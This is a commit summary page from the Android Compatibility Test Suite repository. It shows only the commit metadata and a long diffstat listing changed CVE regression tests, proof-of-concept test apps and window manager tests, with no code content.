summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorAndroid Build Coastguard Worker <android-build-coastguard-worker@google.com>2022-10-10 16:03:19 +0000
committerAndroid Build Coastguard Worker <android-build-coastguard-worker@google.com>2022-10-10 16:03:19 +0000
commit76dfb6931697743b0416d54f907193e7cfda2c79 (patch)
tree8860d48835313b2cb48265b12e195dae7a2dd92a
parenta6be63d15ff61440eb5260f4829f96fc2b5e8b77 (diff)
parent4f1dc64623c97da5d6b3e0b9fcab5a6b152f0922 (diff)
downloadcts-76dfb6931697743b0416d54f907193e7cfda2c79.tar.gz
Snap for 9157512 from 4f1dc64623c97da5d6b3e0b9fcab5a6b152f0922 to mainline-tzdata3-releaseaml_tz3_312410020aml_tz3_312410010
Change-Id: Ia60b07413cfe8be61373f1095ee018983ac6a700
Diffstat
-rw-r--r--apps/MainlineModuleDetector/Android.mk40
-rw-r--r--apps/MainlineModuleDetector/OWNERS3
-rw-r--r--apps/MainlineModuleDetector/src/com/android/cts/mainlinemoduledetector/MainlineModuleDetector.java49
-rw-r--r--hostsidetests/media/bitstreams/AndroidTest.xml10
-rw-r--r--hostsidetests/securitybulletin/Android.bp3
-rw-r--r--hostsidetests/securitybulletin/res/cve_2021_39623.oggbin0 -> 1001211 bytes
-rw-r--r--hostsidetests/securitybulletin/res/cve_2022_22082.dsfbin0 -> 28135 bytes
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2021-39623/Android.bp36
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2021-39623/poc.cpp99
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java43
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Bug_182282630.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Bug_182808318.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Bug_182810085.java54
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Bug_183410508.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Bug_183411210.java3
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Bug_183411279.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Bug_183613671.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Bug_183794206.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Bug_183963253.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Bug_187957589.java6
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java13
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java7
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java8
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java8
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java14
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9410.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9537.java7
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9547.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9549.java7
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9564.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java6
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java6
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9593.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9594.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java7
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2011.java8
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2012.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java6
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2015.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2017.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2020.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2021.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2022.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2027.java7
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2031.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2038.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2039.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java7
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java7
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java6
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java6
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2136.java8
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2178.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2180.java3
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_9247.java8
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java6
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0015.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0018.java20
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0034.java10
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java8
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java8
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java8
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0072.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0226.java7
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0241.java7
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0338.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0420.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0448.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0458.java3
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_11164.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_11173.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_11282.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java8
-rwxr-xr-xhostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29661.java8
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0313.java7
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0315.java17
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0441.java51
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0473.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0478.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0484.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0490.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0523.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0586.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0591.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0596.java7
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0636.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0642.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0650.java10
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0685.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0689.java7
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0691.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0693.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0706.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0919.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0925.java6
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0928.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0953.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0954.java48
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0956.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0965.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_1906.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_30351.java8
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39623.java56
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39626.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39664.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39665.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39675.java5
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39692.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39700.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39701.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39702.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39704.java57
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39706.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39707.java74
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39794.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39795.java73
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39796.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39797.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39804.java8
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39808.java51
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39810.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20004.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20007.java6
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20115.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20123.java3
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20127.java3
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20131.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20138.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20147.java9
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20197.java71
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20223.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20230.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20347.java4
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20348.java60
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20349.java60
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20353.java54
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_22082.java50
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/HostsideMainlineModuleDetector.java60
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc16_06.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc16_10.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc16_12.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java12
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc17_06.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java69
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc18_06.java19
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc19_03.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc19_05.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc19_07.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc20_01.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc20_03.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc20_06.java11
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc20_11.java13
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/Poc21_01.java13
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java143
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/RegexUtils.java143
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java367
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java24
-rw-r--r--hostsidetests/securitybulletin/test-apps/BUG-182810085/Android.bp31
-rw-r--r--hostsidetests/securitybulletin/test-apps/BUG-182810085/AndroidManifest.xml48
-rw-r--r--hostsidetests/securitybulletin/test-apps/BUG-182810085/res/layout/activity_main.xml27
-rw-r--r--hostsidetests/securitybulletin/test-apps/BUG-182810085/res/values/strings.xml19
-rw-r--r--hostsidetests/securitybulletin/test-apps/BUG-182810085/src/android/security/cts/BUG_182810085/Constants.java25
-rw-r--r--hostsidetests/securitybulletin/test-apps/BUG-182810085/src/android/security/cts/BUG_182810085/DeviceTest.java122
-rw-r--r--hostsidetests/securitybulletin/test-apps/BUG-182810085/src/android/security/cts/BUG_182810085/MainActivity.java85
-rw-r--r--hostsidetests/securitybulletin/test-apps/BUG-182810085/src/android/security/cts/BUG_182810085/OverlayService.java95
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0441/Android.bp39
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0441/AndroidManifest.xml35
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0441/res/layout/activity_main.xml26
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0441/res/values/integers.xml22
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0441/res/values/strings.xml30
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0441/src/android/security/cts/CVE_2021_0441/DeviceTest.java101
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0441/src/android/security/cts/CVE_2021_0441/PocActivity.java55
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0954/Android.bp8
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0954/AndroidManifest.xml18
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0954/res/values/integers.xml21
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0954/res/values/strings.xml38
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0954/src/android/security/cts/CVE_2021_0954/DeviceTest.java164
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0954/src/android/security/cts/CVE_2021_0954/PocService.java98
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39626/Android.bp2
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39626/AndroidManifest.xml9
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39626/res/values/integers.xml23
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39626/res/values/strings.xml28
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39626/src/android/security/cts/CVE_2021_39626/DeviceTest.java139
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39626/src/android/security/cts/CVE_2021_39626/PocActivity.java78
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39704/Android.bp38
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39704/AndroidManifest.xml40
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39704/res/values/integers.xml24
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39704/res/values/strings.xml27
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39704/src/android/security/cts/CVE_2021_39704/DeviceTest.java85
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39704/src/android/security/cts/CVE_2021_39704/PocActivity.java59
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39704/src/android/security/cts/CVE_2021_39704/PocService.java103
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39707/Android.bp39
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39707/AndroidManifest.xml38
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39707/res/values/strings.xml27
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39707/src/android/security/cts/CVE_2021_39707/DeviceTest.java106
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39707/src/android/security/cts/CVE_2021_39707/PocActivity.java25
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39707/src/android/security/cts/CVE_2021_39707/PocReceiver.java41
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39795/Android.bp36
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39795/AndroidManifest.xml27
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39795/res/values/strings.xml32
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39795/src/android/security/cts/CVE_2021_39795/DeviceTest.java94
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39808/Android.bp38
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39808/AndroidManifest.xml30
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39808/res/values/integers.xml27
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39808/res/values/strings.xml35
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39808/src/android/security/cts/CVE_2021_39808/DeviceTest.java82
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-39808/src/android/security/cts/CVE_2021_39808/PocService.java137
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20007/attacker-app/AndroidManifest.xml2
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20007/attacker-app/src/android/security/cts/CVE_2022_20007_attacker/PocAttackerActivity.java (renamed from hostsidetests/securitybulletin/test-apps/CVE-2022-20007/attacker-app/src/android/security/cts/CVE_2022_20007_attacker/PocActivity.java)2
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/Android.bp33
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/AndroidManifest.xml32
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/res/layout/activity_main.xml25
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/res/values/integers.xml21
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/res/values/strings.xml22
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20007/second-test-app/src/android/security/cts/CVE_2022_20007_second/SecondPocActivity.java57
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/Android.bp1
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/AndroidManifest.xml4
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/res/values/integers.xml5
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/res/values/strings.xml14
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/src/android/security/cts/CVE_2022_20007/DeviceTest.java150
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/src/android/security/cts/CVE_2022_20007/FirstPocActivity.java (renamed from hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/src/android/security/cts/CVE_2022_20007/PocActivity.java)30
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20007/test-app/src/android/security/cts/CVE_2022_20007/PocMainActivity.java65
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20197/Android.bp38
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20197/AndroidManifest.xml24
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20197/res/values/strings.xml21
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20197/src/android/security/cts/CVE_2022_20197/DeviceTest.java49
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20223/res/values/strings.xml6
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20223/src/android/security/cts/CVE_2022_20223/DeviceTest.java89
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20223/src/android/security/cts/CVE_2022_20223/PocBroadcastReceiver.java19
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20347/src/android/security/cts/CVE_2022_20347/DeviceTest.java49
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20348/Android.bp39
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20348/AndroidManifest.xml35
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20348/res/values/strings.xml26
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20348/res/xml/device_policies.xml20
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20348/src/android/security/cts/CVE_2022_20348/DeviceTest.java115
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20348/src/android/security/cts/CVE_2022_20348/PocDeviceAdminReceiver.java22
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20349/Android.bp39
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20349/AndroidManifest.xml35
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20349/res/values/strings.xml26
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20349/res/xml/device_policies.xml20
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20349/src/android/security/cts/CVE_2022_20349/DeviceTest.java118
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20349/src/android/security/cts/CVE_2022_20349/PocDeviceAdminReceiver.java22
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20353/Android.bp38
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20353/AndroidManifest.xml35
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20353/res/values/integers.xml22
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20353/res/values/strings.xml38
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20353/src/android/security/cts/CVE_2022_20353/DeviceTest.java151
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2022-20353/src/android/security/cts/CVE_2022_20353/PocActivity.java62
-rw-r--r--tests/accessibility/Android.bp2
-rw-r--r--tests/accessibility/AndroidManifest.xml11
-rw-r--r--tests/accessibility/res/values/strings.xml3
-rw-r--r--tests/accessibility/res/xml/no_feedback_accessibilityservice.xml (renamed from apps/MainlineModuleDetector/AndroidManifest.xml)19
-rw-r--r--tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java34
-rw-r--r--tests/accessibility/src/android/view/accessibility/cts/NoFeedbackAccessibilityService.java29
-rw-r--r--tests/framework/base/windowmanager/AndroidManifest.xml4
-rwxr-xr-xtests/framework/base/windowmanager/backgroundactivity/AppA/AndroidManifest.xml2
-rw-r--r--tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/VirtualDisplayActivity.java37
-rw-r--r--tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java21
-rw-r--r--tests/framework/base/windowmanager/overlayappbase/AndroidManifest.xml17
-rw-r--r--tests/framework/base/windowmanager/overlayappbase/res/anim/fade.xml20
-rw-r--r--tests/framework/base/windowmanager/overlayappbase/res/values/styles.xml23
-rw-r--r--tests/framework/base/windowmanager/overlayappbase/src/android/server/wm/overlay/Components.java28
-rw-r--r--tests/framework/base/windowmanager/overlayappbase/src/android/server/wm/overlay/TrampolineActivity.java41
-rw-r--r--tests/framework/base/windowmanager/overlayappbase/src/android/server/wm/overlay/TranslucentFloatingActivity.java63
-rw-r--r--tests/framework/base/windowmanager/src/android/server/wm/ActivityRecordInputSinkTests.java190
-rw-r--r--tests/framework/base/windowmanager/src/android/server/wm/ActivityRecordInputSinkTestsActivity.java81
-rw-r--r--tests/framework/base/windowmanager/src/android/server/wm/StartActivityTests.java24
-rw-r--r--tests/framework/base/windowmanager/src/android/server/wm/intent/Activities.java8
